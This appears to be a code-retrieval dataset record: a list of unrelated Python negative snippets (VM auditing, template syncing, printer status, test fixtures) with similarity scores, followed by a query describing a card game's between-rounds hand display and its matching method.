300\n if os.path.exists(jfile) and os.stat(jfile).st_size > 0:\n logging.info(\"After provision data file: %s\" % (jfile))\n try:\n with open(jfile) as data_file:\n reqData = json.load(data_file)\n except APIError, e:\n print \"Loading Json found problem: %s\" % str(e)\n sys.exit(1)\n\n \n if 'name' in reqData[0] and 'status' in reqData[0]:\n logging.debug(\"Value ##### %s\" % reqData[0]['name'])\n for j in range(len(reqData[0]['networks'])):\n logging.info(\"Hostname %s configured \" \\\n \"with Ip address %s\" % \\\n ( reqData[0]['name'], reqData[0]['networks'][j]['address']))\n self.vmstat[self.reqid]['vmname']=reqData[0]['name']\n self.vmstat[self.reqid]['ipaddress']=reqData[0]['networks'][j]['address']\n self.vmstat[self.reqid]['vmid']=reqData[0]['catalogResource']['parentResourceRef']['id']\n print \"\\n\"\n print \"SR Reached IP: %s (HH:MM:SS)\" % \\\n str(datetime.timedelta(seconds=self.gtintval))\n break\n else:\n self.vmstat[self.reqid]['vmname'] = \"\"\n self.vmstat[self.reqid]['ipaddress'] = \"\"\n self.vmstat[self.reqid]['ipaddress'] = \"\"\n\n else:\n logging.warn(\"- vcac cloudclient json file missing \" \\\n \"or does not contains hostname or Ip \" \\\n \"details i.e empty\")\n self.vmstat[self.reqid]['vmname'] = \"\"\n self.vmstat[self.reqid]['ipaddress'] = \"\"\n self.vmstat[self.reqid]['ipaddress'] = \"\"\n #self.update_helpdesk(self.reqdata)\n \n \n logging.debug(\"Before return: %s\" 
% reqData )\n logging.debug(\"Real Value return: %s\" % self.vmstat )\n return self.vmstat", "def main():\n\n args = cli.get_args()\n\n audit = {}\n try:\n service_instance,content = connect_vc(args.host,args.user,args.password,args.port)\n\n if sys.stdout.isatty():\n print(\"vCenter: %s\" % args.host)\n \n content = service_instance.RetrieveContent()\n\n container = content.rootFolder # starting point to look into\n datacenters = get_datacenters(content)\n for dc in datacenters:\n datacenters[dc]['clusters'] = get_clusters(datacenters[dc]['dc'])\n\n datacenters[dc]['vms'] = get_vms(datacenters[dc]['dc'].vmFolder)\n \n get_nets(dc)\n get_dstores(dc)\n\n vmcount=0\n \n for dc in datacenters:\n for vm in sorted(datacenters[dc]['vms'],key=lambda s: s.lower()):\n vmcount+=1\n v = datacenters[dc]['vms'][vm]\n c = find_cluster(datacenters[dc]['clusters'],v.runtime.host.name)\n vort = \"Template\" if v.summary.config.template == True else \"VM\"\n audit[v.name]={}\n audit[v.name]['datacenter'] = dc\n audit[v.name]['cluster'] = c\n audit[v.name]['type'] = vort\n audit[v.name]['hostname'] = v.summary.guest.hostName\n audit[v.name]['guestid'] = v.config.guestId\n audit[v.name]['fullname'] = v.summary.config.guestFullName\n audit[v.name]['state'] = v.runtime.powerState\n audit[v.name]['ip'] = v.guest.ipAddress\n if sys.stdout.isatty():\n print(vmcount,\"Guests processed\",end='\\r')\n sys.stdout.flush()\n# print(\"%-15s:%-10s %-8s %-30s %-30s %s %s %s %s\" % (dc, c, vort,v.name,v.summary.guest.hostName, v.config.guestId, v.summary.config.guestFullName,v.guest.guestState,v.guest.ipAddress ))\n #print vort, v.name, v.summary.guest.hostName, v.guest.guestId, v.summary.config.guestFullName,v.guest.guestState,v.guest.ipAddress #,v.summary\n# print(\"\\ncount:\",vmcount)\n \n print(json.dumps(audit, indent=4, separators=(',', ': ')))\n \n except vmodl.MethodFault as error:\n print(\"Caught vmodl fault : \" + error.msg)\n return -1\n\n return 0", "def _prepare_get_request(self, key):\n\n return {\n 'TableName': self.table_name,\n 'Key': {\n self._key_field.name: {\n self._key_field.data_type: key\n }\n }\n }", "def pull_templates(self):\n try:\n backend_templates = self.client.list_all_templates()\n except VMwareError as e:\n raise VMwareBackendError(e)\n\n if is_basic_mode():\n # If basic mode is enabled, we should filter out templates which have more than 1 NIC\n backend_templates = [\n template\n for template in backend_templates\n if len(template['template']['nics']) == 1\n ]\n\n backend_templates_map = {\n item['library_item']['id']: item for item in backend_templates\n }\n\n frontend_templates_map = {\n p.backend_id: p\n for p in models.Template.objects.filter(settings=self.settings)\n }\n\n stale_ids = set(frontend_templates_map.keys()) - set(\n backend_templates_map.keys()\n )\n new_ids = set(backend_templates_map.keys()) - set(frontend_templates_map.keys())\n common_ids = set(backend_templates_map.keys()) & set(\n frontend_templates_map.keys()\n )\n\n for library_item_id in new_ids:\n template = self._backend_template_to_template(\n backend_templates_map[library_item_id]\n )\n template.save()\n\n for library_item_id in common_ids:\n backend_template = self._backend_template_to_template(\n backend_templates_map[library_item_id]\n )\n frontend_template = frontend_templates_map[library_item_id]\n fields = (\n 'cores',\n 'cores_per_socket',\n 'ram',\n 'disk',\n 'guest_os',\n 'modified',\n 'description',\n )\n update_pulled_fields(frontend_template, backend_template, fields)\n\n 
models.Template.objects.filter(\n settings=self.settings, backend_id__in=stale_ids\n ).delete()", "def create_data_model():\n data = {}\n # Locations in block units\n data['locations'] = [\n ] # yapf: disable\n data['num_vehicles'] = 1\n data['depot'] = 0\n return data", "def _build_base_structure(self):\n result = dict(self.contents)\n # clean out optional fields that were missing\n if not self.contents[DataParticleKey.PORT_TIMESTAMP]:\n del result[DataParticleKey.PORT_TIMESTAMP]\n if not self.contents[DataParticleKey.INTERNAL_TIMESTAMP]:\n del result[DataParticleKey.INTERNAL_TIMESTAMP]\n return result", "def _createDataFromProject(self):\n project_dict = self._project.asDict()\n data_blocks = {}\n headers_blocks = {}\n for experiment_id, experiment_dict in project_dict['experiments'].items():\n data = []\n headers = []\n for data_id, data_list in experiment_dict['calculated'].items():\n headers.append(data_id)\n data.append(data_list)\n headers_blocks[experiment_id] = headers\n data_transposed = [*zip(*data)]\n data_blocks[experiment_id] = data_transposed\n return headers_blocks, data_blocks", "def _fill_template(\n self,\n template: Dict[Text, Any],\n template_vars: Dict[Text, Any]\n ) -> Dict[Text, Any]:\n\n line_object_keys = [\"quickReply\", \"items\", \"action\", \"template\", \"actions\"]\n\n if type(template) == list:\n for item in template:\n self._fill_template(item, template_vars)\n else:\n self._fill_template_text(template, template_vars)\n for key in line_object_keys:\n if key in template:\n self._fill_template(template[key], template_vars)\n\n return template", "def build_structure(self):\n session = meta.Session()\n \n content = {}\n \n # TODO key metadata?\n if self.include_key_metadata:\n content['key_metadata'] = [kmd.to_dict(encode=False) for kmd in session.query(model.KeyMetadata).all()]\n \n content['resources'] = []\n \n rsrc_t = model.resources_table\n pass_t = model.passwords_table\n grp_t = model.groups_table\n \n q = session.query(model.Resource).order_by(rsrc_t.c.name)\n if self.resource_filters:\n q = q.join(model.GroupResource)\n q = q.filter(and_(*self.resource_filters))\n \n q = q.order_by(rsrc_t.c.name)\n for resource in q.all():\n rdict = resource.to_dict(decrypt=True)\n pw_q = resource.passwords\n if self.password_filters:\n pw_q = pw_q.filter(and_(*self.password_filters))\n pw_q = pw_q.order_by(pass_t.c.username)\n rdict['passwords'] = [pw.to_dict(decrypt=True) for pw in pw_q.all()]\n rdict['groups'] = [g.name for g in resource.groups.order_by(grp_t.c.name).all()]\n content['resources'].append(rdict)\n \n return content", "def extract_info(self, snyk_data, json_data):\n for eco in SUPPORTED_ECOSYSTEMS:\n if eco in snyk_data:\n logger.info(\"Adding data for {} from the parsed snyk feed.\".format(eco))\n eco_data = snyk_data[eco]\n for pkg in eco_data:\n if pkg not in json_data[eco]:\n json_data[eco][pkg] = {}\n for vuln in eco_data[pkg]['vulnerabilities']:\n id = vuln['id']\n logger.info(\"Adding {}.\".format(id))\n json_data[eco][pkg][id] = self.generate_vuln_json(vuln, pkg)\n else:\n logger.info(\"No data for {} present in the parsed snyk feed.\".format(eco))\n return json_data", "def _process_dict(data):\n new_dict = {}\n for key in data.keys():\n\tnew_dict['name'] = data['printerName']\n #new_dict[key] = data[key]\n\n #FIGURE OUT AND UPDATE PRINTER STATUS\n status = BUSY_STATUS\n error_msg = \"\"\n if \"FrontPanelMessage\" in data:\n if data[\"FrontPanelMessage\"].lower() in READY_MESSAGES:\n status = READY_STATUS\n elif \"error\" in 
data[\"FrontPanelMessage\"].lower():\n status = ERROR_STATUS\n error_msg = \"general error\"\n \n if \"TonerStatus\" in data:\n if data[\"TonerStatus\"].find(\"2\") != -1:\n status = ERROR_STATUS\n error_msg = \"Toner Error\"\n #if len(new_dict[\"TonerStatus\"]) > 4:\n #new_dict[\"TonerStatus\"] = new_dict[\"TonerStatus\"][4:]\n\n if \"PaperStatus\" in data:\n if data[\"PaperStatus\"].find(\"2\") != -1:\n status = ERROR_STATUS\n error_msg = \"Paper Status Error\"\n elif data[\"PaperStatus\"].find(\"1\") != -1:\n status = ERROR_STATUS\n error_msg = \"Out of Paper\"\n #if len(new_dict[\"PaperStatus\"]) > 4:\n #new_dict[\"PaperStatus\"] = new_dict[\"PaperStatus\"][4:]\n\n if \"PaperJamStatus\" in data:\n if data[\"PaperJamStatus\"].find(\"1\") != -1:\n status = ERROR_STATUS\n error_msg = \"Paper Jam\"\n #if len(new_dict[\"PaperJamStatus\"]) > 4:\n #new_dict[\"PaperJamStatus\"] = new_dict[\"PaperJamStatus\"][4:]\n\n new_dict[\"status\"] = status\n new_dict[\"error_msg\"] = error_msg\n new_dict[\"location\"] = PRINTERS[new_dict[\"name\"]][0]\n new_dict[\"building_name\"] = PRINTERS[new_dict[\"name\"]][1]\n new_dict[\"latitude\"] = PRINTERS[new_dict[\"name\"]][2]\n new_dict[\"longitude\"] = PRINTERS[new_dict[\"name\"]][3]\n new_dict[\"atResidence\"] = PRINTERS[new_dict[\"name\"]][4]\n return new_dict", "def _get_user_data(self):\n return {\"key\": self._key}", "def _create_instance_dict(**kwargs):\n inst = {}\n # NOTE(jk0): If an integer is passed as the image_ref, the image\n # service will use the default image service (in this case, the fake).\n inst['image_ref'] = '1'\n inst['reservation_id'] = 'r-fakeres'\n inst['user_id'] = kwargs.get('user_id', 'admin')\n inst['project_id'] = kwargs.get('project_id', 'fake')\n inst['instance_type_id'] = '1'\n inst['host'] = kwargs.get('host', 'dummy')\n inst['vcpus'] = kwargs.get('vcpus', 1)\n inst['memory_mb'] = kwargs.get('memory_mb', 20)\n inst['local_gb'] = kwargs.get('local_gb', 30)\n inst['vm_state'] = kwargs.get('vm_state', vm_states.ACTIVE)\n inst['power_state'] = kwargs.get('power_state', power_state.RUNNING)\n inst['task_state'] = kwargs.get('task_state', None)\n inst['availability_zone'] = kwargs.get('availability_zone', None)\n inst['ami_launch_index'] = 0\n inst['launched_on'] = kwargs.get('launched_on', 'dummy')\n return inst", "def __init__(self):\n self.id = None\n self.typeInfo['id'] = 'string'\n \"\"\"the account associated with the disk volume\"\"\"\n self.account = None\n self.typeInfo['account'] = 'string'\n \"\"\"the create date of the vm snapshot\"\"\"\n self.created = None\n self.typeInfo['created'] = 'date'\n \"\"\"indiates if this is current snapshot\"\"\"\n self.current = None\n self.typeInfo['current'] = 'boolean'\n \"\"\"the description of the vm snapshot\"\"\"\n self.description = None\n self.typeInfo['description'] = 'string'\n \"\"\"the display name of the vm snapshot\"\"\"\n self.displayname = None\n self.typeInfo['displayname'] = 'string'\n \"\"\"the domain associated with the disk volume\"\"\"\n self.domain = None\n self.typeInfo['domain'] = 'string'\n \"\"\"the ID of the domain associated with the disk volume\"\"\"\n self.domainid = None\n self.typeInfo['domainid'] = 'string'\n \"\"\"the name of the vm snapshot\"\"\"\n self.name = None\n self.typeInfo['name'] = 'string'\n \"\"\"the parent ID of the vm snapshot\"\"\"\n self.parent = None\n self.typeInfo['parent'] = 'string'\n \"\"\"the parent displayName of the vm snapshot\"\"\"\n self.parentName = None\n self.typeInfo['parentName'] = 'string'\n \"\"\"the project name of 
the vpn\"\"\"\n self.project = None\n self.typeInfo['project'] = 'string'\n \"\"\"the project id of the vpn\"\"\"\n self.projectid = None\n self.typeInfo['projectid'] = 'string'\n \"\"\"the state of the vm snapshot\"\"\"\n self.state = None\n self.typeInfo['state'] = 'state'\n \"\"\"VM Snapshot type\"\"\"\n self.type = None\n self.typeInfo['type'] = 'string'\n \"\"\"the vm ID of the vm snapshot\"\"\"\n self.virtualmachineid = None\n self.typeInfo['virtualmachineid'] = 'string'\n \"\"\"the Zone ID of the vm snapshot\"\"\"\n self.zoneid = None\n self.typeInfo['zoneid'] = 'string'", "def get_data_for_task_manager(data: dict) -> dict:\n if check_host(data['hostIp']):\n command = f\"ssh user@{data['hostIp']} -i ../id_rsa 'C:\\Setup\\{data['scriptName']}'\"\n dict_from_device = check_response_from_device(start_process_on_device(command))\n if dict_from_device[\"stringFromDevice\"] == \"correct\": \n dict_from_device[\"resultRequest\"] = True\n return dict_from_device\n return dict(resultRequest=False)", "def get_context_data(self):\n try:\n app_data = self._get_app_data()\n except (LTIException, PortabilityError) as error:\n logger.warning(str(error))\n app_data = {\n \"state\": \"error\",\n \"modelName\": self.model.RESOURCE_NAME,\n \"resource\": None,\n }\n\n return {\n \"app_data\": json.dumps(app_data),\n \"static_base_url\": f\"{settings.ABSOLUTE_STATIC_URL}js/\",\n \"external_javascript_scripts\": settings.EXTERNAL_JAVASCRIPT_SCRIPTS,\n }", "def _dump_template(self, utils_image) -> Dict[str, str]:\n cmd = f\"docker run -i --rm --entrypoint python {utils_image}\"\n p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT)\n out, _ = p.communicate(input=SCRIPT.encode())\n output = out.decode()\n if p.returncode != 0:\n self._logger.error(\"Failed to dump %s template.py\\n%s\", utils_image, output)\n raise RuntimeError(\"Failed to dump %s template.py\" % utils_image)\n lines = output.splitlines()\n result = {}\n for line in lines:\n key, value = line.split()\n result[key] = value\n return result", "def template_data(self) -> pulumi.Output[Any]:\n return pulumi.get(self, \"template_data\")", "def prepare_product_update_data(self, template, update_image, update_basic_detail, data):\n instance = template.woo_instance_id\n flag = False\n tmpl_images = []\n if update_image:\n tmpl_images += self.get_gallery_images(instance, template, template.product_tmpl_id)\n data.update({\"images\":tmpl_images})\n flag = True\n\n if update_basic_detail:\n\n weight = self.convert_weight_by_uom(template.product_tmpl_id.weight, instance)\n\n description = ''\n short_description = ''\n if template.woo_description:\n woo_template_id = template.with_context(lang=instance.woo_lang_id.code)\n description = woo_template_id.woo_description\n\n if template.woo_short_description:\n woo_template_id = template.with_context(lang=instance.woo_lang_id.code)\n short_description = woo_template_id.woo_short_description\n data.update({\n 'name':template.name,\n 'enable_html_description':True,\n 'enable_html_short_description':True, 'description':description,\n 'short_description':short_description,\n 'weight':str(weight),\n 'taxable':template.taxable and 'true' or 'false'\n })\n woo_categ_ids = list(map(int,template.woo_categ_ids.mapped(\"woo_categ_id\")))\n if all(woo_categ_ids):\n categ_ids = [{'id': cat_id} for cat_id in woo_categ_ids]\n data.update({'categories':categ_ids})\n\n woo_tag_ids = list(map(int,template.woo_tag_ids.mapped(\"woo_tag_id\")))\n if all(woo_tag_ids):\n tag_ids = [{'id': tag_id} for tag_id in 
woo_tag_ids]\n data.update({'tags':tag_ids})\n\n return flag, data", "def create_current_host_dict_playbook(self):\n\n host_dict = {\n 'no_access_hosts': self.module.params['no_access_hosts'],\n 'read_only_hosts': self.module.params['read_only_hosts'],\n 'read_only_root_hosts': self.module.params[\n 'read_only_root_hosts'],\n 'read_write_hosts': self.module.params['read_write_hosts'],\n 'read_write_root_hosts': self.module.params[\n 'read_write_root_hosts']\n }\n return host_dict", "def gen_vault_response_kv2(gen_processed_config):\n\n def _gen_vault_repsonse(processed_config=gen_processed_config(), user_key=\"user\", pwd_key=\"pwd\"):\n vault_response = {\n \"data\": {\n \"data\": {user_key: processed_config[\"acme\"][\"user\"], pwd_key: processed_config[\"acme\"][\"pwd\"]},\n \"metadata\": {},\n }\n }\n return vault_response\n\n return _gen_vault_repsonse", "def test_ws_getItemInfosWithReusedPODTemplates(self):\n # in the PM test profile, some templates are only defined for the plonemeeting-assembly\n self.usedMeetingConfigId = \"plonegov-assembly\"\n self.changeUser('pmCreator1')\n item = self.create('MeetingItem')\n # first check that the only returned template is a template rusing another\n viewlet = self._get_viewlet(\n context=item,\n manager_name='plone.belowcontenttitle',\n viewlet_name='document-generation-link')\n templates = viewlet.get_generable_templates()\n self.assertEqual(len(templates), 1)\n self.assertTrue(templates[0].pod_template_to_use)\n self.assertIsNone(templates[0].odt_file)\n # get the reponse\n resp = self._getItemInfos(item.UID(), showTemplates=True, toBeDeserialized=False)\n # we have 1 template\n self.assertEqual(len(resp._itemInfo[0]._templates), 1)\n # templateFilename was taken from template to use\n self.assertEqual(resp._itemInfo[0]._templates[0]._templateFilename, u'Item.odt')\n self.assertEqual(resp._itemInfo[0]._templates[0]._templateFormat, 'odt')", "def gen_vault_response_kv1(gen_processed_config):\n\n def _gen_vault_repsonse(processed_config=gen_processed_config(), user_key=\"user\", pwd_key=\"pwd\"):\n vault_response = {\n \"data\": {user_key: processed_config[\"acme\"][\"user\"], pwd_key: processed_config[\"acme\"][\"pwd\"]}\n }\n return vault_response\n\n return _gen_vault_repsonse", "def fixture_tile_details():\n return {\n \"version\": 1,\n \"revision\": 1,\n \"timestamp\": \"2018-06-19T23:04:39.097Z\",\n \"timestamp_ms\": 1529449479097,\n \"result_code\": 0,\n \"result\": {\n TILE_TILE_UUID: {\n \"thumbnailImage\": \"https://local-tile-pub.s3.amazonaws.com/..\",\n \"tileState\": {\n \"ringStateCode\": 0,\n \"connectionStateCode\": 0,\n \"uuid\": TILE_TILE_UUID,\n \"tile_uuid\": TILE_TILE_UUID,\n \"client_uuid\": TILE_CLIENT_UUID,\n \"timestamp\": 1512615215149,\n \"advertised_rssi\": 1.4e-45,\n \"client_rssi\": 1.4e-45,\n \"battery_level\": 1.4e-45,\n \"latitude\": 21.9083423,\n \"longitude\": -72.4982138,\n \"altitude\": 1821.129812,\n \"h_accuracy\": 5.0,\n \"v_accuracy\": 3.0,\n \"speed\": 1.4e-45,\n \"course\": 1.4e-45,\n \"authentication\": None,\n \"owned\": True,\n \"has_authentication\": None,\n \"lost_timestamp\": -1,\n \"connection_client_uuid\": TILE_CLIENT_UUID,\n \"connection_event_timestamp\": 1512615234268,\n \"last_owner_update\": 1512615215149,\n \"connection_state\": \"READY\",\n \"ring_state\": \"STOPPED\",\n \"is_lost\": False,\n \"voip_state\": \"OFFLINE\",\n },\n \"entityName\": \"TILE\",\n \"tile_uuid\": \"19264d2dffdbca32\",\n \"firmware_version\": \"01.12.14.0\",\n \"owner_user_uuid\": 
\"2ea56f4d-6576-4b4e-af11-3410cc65e373\",\n \"name\": TILE_TILE_NAME,\n \"category\": None,\n \"image_url\": \"https://local-tile-pub.s3.amazonaws.com/...\",\n \"visible\": True,\n \"is_dead\": False,\n \"hw_version\": \"02.09\",\n \"product\": \"DUTCH1\",\n \"archetype\": \"WALLET\",\n \"configuration\": {\"fw10_advertising_interval\": None},\n \"last_tile_state\": {\n \"ringStateCode\": 0,\n \"connectionStateCode\": 0,\n \"uuid\": \"19264d2dffdbca32\",\n \"tile_uuid\": \"19264d2dffdbca32\",\n \"client_uuid\": \"a01bf97a-c89a-40e2-9534-29976010fb03\",\n \"timestamp\": 1512615215149,\n \"advertised_rssi\": 1.4e-45,\n \"client_rssi\": 1.4e-45,\n \"battery_level\": 1.4e-45,\n \"latitude\": 39.797571,\n \"longitude\": -104.887826,\n \"altitude\": 1588.002773,\n \"h_accuracy\": 5.0,\n \"v_accuracy\": 3.0,\n \"speed\": 1.4e-45,\n \"course\": 1.4e-45,\n \"authentication\": None,\n \"owned\": True,\n \"has_authentication\": None,\n \"lost_timestamp\": -1,\n \"connection_client_uuid\": TILE_CLIENT_UUID,\n \"connection_event_timestamp\": 1512615234268,\n \"last_owner_update\": 1512615215149,\n \"connection_state\": \"DISCONNECTED\",\n \"ring_state\": \"STOPPED\",\n \"is_lost\": False,\n \"voip_state\": \"OFFLINE\",\n },\n \"firmware\": {\n \"expected_firmware_version\": \"\",\n \"expected_firmware_imagename\": \"\",\n \"expected_firmware_urlprefix\": \"\",\n \"expected_firmware_publish_date\": 0,\n \"expected_ppm\": None,\n \"expected_advertising_interval\": None,\n \"security_level\": 1,\n \"expiry_timestamp\": 1529471079097,\n \"expected_tdt_cmd_config\": None,\n },\n \"auth_key\": \"aliuUAS7da980asdHJASDQ==\",\n \"renewal_status\": \"LEVEL1\",\n \"metadata\": {},\n \"auto_retile\": False,\n \"status\": \"ACTIVATED\",\n \"tile_type\": \"TILE\",\n \"registration_timestamp\": 1482711833983,\n \"is_lost\": False,\n \"auth_timestamp\": 1512287015405,\n \"activation_timestamp\": 1482711835011,\n \"last_modified_timestamp\": 1514353410254,\n }\n },\n }", "def create_dicts():\n load_data_for_dict('data/atis/train/seq.in', 'data/atis/voc/vocabulary.json')\n load_data_for_dict('data/atis/valid/seq.in', 'data/atis/voc/vocabulary.json')\n load_data_for_dict('data/atis/test/seq.in', 'data/atis/voc/vocabulary.json') \n load_data_for_dict('data/atis/train/seq.out', 'data/atis/voc/slot_vocabulary.json')" ]
[ "0.69213694", "0.6188512", "0.6179154", "0.6003007", "0.5900166", "0.58198947", "0.58040434", "0.5778774", "0.5772093", "0.5710987", "0.5700737", "0.56920326", "0.56712186", "0.566643", "0.564755", "0.56175077", "0.56043386", "0.5603194", "0.55743086", "0.5572557", "0.5553227", "0.55519825", "0.5510064", "0.5504329", "0.54972905", "0.5483972", "0.5468972", "0.54597336", "0.5429259", "0.5423212", "0.5398495", "0.53936344", "0.53705597", "0.5367941", "0.5359332", "0.5349633", "0.5348408", "0.5348325", "0.53444314", "0.5343028", "0.53360045", "0.53355515", "0.5332975", "0.529744", "0.5289834", "0.5281824", "0.5277394", "0.52753925", "0.5268477", "0.5265853", "0.52465034", "0.5242711", "0.5242412", "0.5228587", "0.51865286", "0.51854354", "0.51765853", "0.5174298", "0.5174165", "0.5174165", "0.51474994", "0.51379406", "0.5134101", "0.51313204", "0.51100296", "0.509941", "0.50761706", "0.5074135", "0.5072227", "0.507167", "0.50686496", "0.506859", "0.50656277", "0.5058943", "0.505637", "0.5053177", "0.5051827", "0.50502735", "0.503945", "0.50368994", "0.503652", "0.50354654", "0.5035388", "0.5030823", "0.50291556", "0.50228494", "0.50181854", "0.5012036", "0.5009403", "0.50090253", "0.50074196", "0.50046897", "0.49963942", "0.49931148", "0.4990816", "0.49852648", "0.49836087", "0.4981416", "0.4979277", "0.49768433" ]
0.7405127
0
This updates the view of the hand; between rounds it displays a message.
def update(self, player_index=0, num_players=1, visible_scards = []): self.visible_scards = visible_scards self.controller._state.player_index = player_index if self.num_players > num_players and self.controller._state.rules.Shared_Board \ and not self.need_updated_buttons: # A player has left the game after the round has begun -- make adjustments so game can continue. self.playerLeftGame(num_players) self.num_players = num_players if self.controller._state.round == -1: self.mesgBetweenRounds(self.help_text) if self.round_advance: self.round_index = self.round_index + 1 if self.round_index < len(self.Meld_Threshold): self.help_text[0] = 'This is the round of ' + str(self.Meld_Threshold[self.round_index]) + ' ! ' self.need_updated_buttons = True # used for Liverpool. else: self.help_text = ['Game has concluded. Scores for each round can be found in command window.'] self.round_advance = False else: if not self.round_index == self.controller._state.round: # Need this to true up round_index if a player joins mid-game. skipped_rounds = self.controller._state.round - self.round_index for idx in range(skipped_rounds): #todo: How to score latecomers should be moved to ruleset. score = 0 self.controller.lateJoinScores(score) self.round_index = self.controller._state.round self.round_advance = True # reset outline colors on ready buttons to what they need to be at the start of the "between rounds" state. self.ready_color_idx = 2 self.not_ready_color_idx = 6 self.last_hand = self.current_hand self.current_hand = self.controller.getHand() if len(self.current_hand) == 0: self.hand_info = [] elif not self.last_hand == self.current_hand: self.hand_info = HandManagement.WrapHand(self, self.current_hand, self.hand_info) HandManagement.ShowHolding(self, self.hand_info) # displays hand self.RuleSetsButtons.ButtonDisplay(self)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def update_display(self):\n self._clear_screen()\n print('Your score is {}'.format(self._roboc.score))\n print(self._roboc.currentmaze)\n print(\"Your viewpoint:\")\n print(self._roboc.get_hidden_game(4))", "def updateChat(self, ):\n self.__redrawChat()", "def viewUpdate(self):\n # Update Capture\n imgtk = self.model.capture\n self.updateImage(self.view.lmain, imgtk)\n # Update Stitch \n imgtk = self.model.stitch\n self.updateImage(self.view.rmain, imgtk)\n self.view.dist.set(self.model.dist)", "def updateDisplay(self, msg):\n t = msg.data\n self.displayLbl.SetLabel(\"%s\" % t)\n self.SetTitle(\"%s\" % t)", "def update_scoreboard(self):\n self.clear()\n self.goto(-(WIDTH//6), (HEIGHT//2-30))\n self.write(self.l_score, align = 'center', font = ('Courier', 20, 'normal'))\n self.goto((WIDTH//6), (HEIGHT//2-30))\n self.write(self.r_score, align = 'center', font = ('Courier', 20, 'normal'))", "def _refresh(self):\n self._need_display_update = True\n self._update()", "def refresh_screen(self):", "def update_board(self, player_answer, chaser_answer, answer):\n if player_answer == answer:\n self.b.player_step()\n line = 'You are RIGHT!'\n else:\n line = 'You are WRONG!'\n self.client.send((NO_RESPONSE + line).encode())\n if chaser_answer == answer:\n self.b.chaser_step()\n line = 'The Chaser is RIGHT!\\n'\n else:\n line = 'The Chaser is WRONG!\\n'\n self.client.send((NO_RESPONSE + line).encode())", "def update(self):\n self.board.update()", "def update_display(self):\r\n\r\n # The display.update() Updates the screen, making the new frame replace the old one. \r\n pg.display.update()\r\n \r\n # clock.tick sets a framerate for the game.\r\n # This is to make the game run at a stable fps \r\n self.clock.tick(cng.FRAMERATE)", "def _update_display(self, game, action):\n self._update_label(action.outer_pos, action.inner_pos, action.move)", "def redraw(self):\n self._view.delete(tk.ALL)\n self._view.draw_entities(self._world.get_all_things())\n # calculate the health and score in every step\n max_hp = self._player.get_max_health()\n current_hp = self._player.get_health()\n # if player is invincible, don't change health\n self._statue.set_health(current_hp / max_hp, self._player.get_invincible())\n self._statue.set_score(self._player.get_score())", "def updateComplete(self):\n self.livesScreen()\n if self.getWave().getLives() == 0:\n self.deathScreen()\n else:\n self.winScreen()", "def showdown(self):\r\n\r\n poker_hands = []\r\n message = \"\"\r\n for player in self.players:\r\n poker_hands.append(player.hand.best_poker_hand(self.community_cards.cards))\r\n\r\n # Reveal all cards when the round is over\r\n player.reveal_cards()\r\n\r\n if poker_hands[0].type > poker_hands[1].type:\r\n message = \"Player {} won! \\nPoker hand >{}< won against >{}<\".format(\r\n self.players[0].name, str(poker_hands[0].type), str(poker_hands[1].type))\r\n self.players[0].credits += self.pot\r\n\r\n if poker_hands[0].type < poker_hands[1].type:\r\n message = \"Player {} won! \\nPoker hand >{}< won against >{}<\".format(\r\n self.players[1].name, str(poker_hands[1].type), str(poker_hands[0].type))\r\n self.players[1].credits += self.pot\r\n\r\n if poker_hands[0].type == poker_hands[1].type:\r\n if poker_hands[0].highest_values > poker_hands[1].highest_values:\r\n message = \"Player {} won! 
\\nHighest value >{}< won against >{}<\".format(\r\n self.players[0].name, str(poker_hands[0].highest_values), str(poker_hands[1].highest_values))\r\n self.players[0].credits += self.pot\r\n\r\n elif poker_hands[0].highest_values < poker_hands[1].highest_values:\r\n message = \"Player {} won! \\nHighest value >{}< won against >{}<\".format(\r\n self.players[1].name, str(poker_hands[1].highest_values), str(poker_hands[0].highest_values))\r\n self.players[1].credits += self.pot\r\n\r\n elif poker_hands[0].highest_values == poker_hands[1].highest_values:\r\n message = \"It is a draw! Both players had >{}< and highest value >{}<\".format(\r\n poker_hands[0].type.name, str(poker_hands[0].highest_values))\r\n\r\n for player in self.players:\r\n player.credits += (self.pot // len(self.players))\r\n else:\r\n self.game_message_warning.emit(\"Incorrect comparison of poker hands\")\r\n\r\n self.new_output.emit(message)\r\n self.game_message.emit(message)\r\n self.new_credits.emit()\r\n self.new_pot.emit()", "def you_won(self):\n self.end_of_level()\n self.message_holder.add_widget(self.you_win_label)\n Clock.schedule_once(self.goto_next_level, 5)", "def update_H(self):", "def update(self, is_my_turn, clue_word, clue_num_guesses, guesses):\r\n pass", "def update(self):\n\n # Update guess tracker\n for i in range(atoms):\n\n ident = 'tracker' + str(i + 1)\n\n if i < len(game.guesslist):\n color = scheme.red\n else:\n color = scheme.white\n\n self.ids[ident].color = color\n\n # Update score\n self.ids.score.text = str(game.score)\n\n # Check for end game conditions! Make button (in)visible.\n if len(game.guesslist) == atoms:\n self.ids.end_button.disabled = False\n self.ids.end_button.opacity = 1\n else:\n self.ids.end_button.disabled = True\n self.ids.end_button.opacity = 0", "def update_figure(self):\n\n self.draw()", "def update(self):\n self.__redrawChat()\n self.__redrawUsers()\n self.__redrawChannels()\n self.__update()", "def game_updated(self):\n\n # replace with your game updated logic\n self.update_board()", "def _do_updates(self):\n is_right = self._puzzle.is_guess_right()\n if is_right:\n self._puzzle.reveal_puzzle()\n else:\n self._jumper.cut_line()", "def display(self, update_board=1):\n\tM,N = self.X, self.Y \n\tif not update_board:\n\t for i in range(0, M):\n\t\tfor j in range(0, N):\n\t\t\tif self.state.has_key( (i,j) ): \n\t\t\t self.scr.addch(j+1, i+1, self.char)\n\t\t\telse:\n\t\t\t self.scr.addch(j+1, i+1, ' ')\n\t self.scr.refresh()\n\t return\n\n\td={} ; self.boring=1\n\tfor i in range(0, M):\n\t L=range( max(0, i-1), min(M, i+2) )\n\t for j in range(0, N):\n\t\ts=0\n\t\tlive=self.state.has_key( (i,j) )\n\t\tfor k in range( max(0, j-1), min(N, j+2) ):\n\t\t for l in L:\n\t\t\tif self.state.has_key( (l,k) ):\n\t\t\t s=s+1\n\t\ts=s-live\n\t\tif s==3: \n\t\t # Birth\n\t\t d[i,j]=1 \n\t\t self.scr.addch(j+1, i+1, self.char)\n\t\t if not live: self.boring=0 \n\t\telif s==2 and live: d[i,j]=1 # Survival\n\t\telif live: \n\t\t # Death\n\t\t self.scr.addch(j+1, i+1, ' ')\n\t\t self.boring=0\n\tself.state=d\n\tself.scr.refresh()", "def _completed(self):\n if self._game.getLives() == 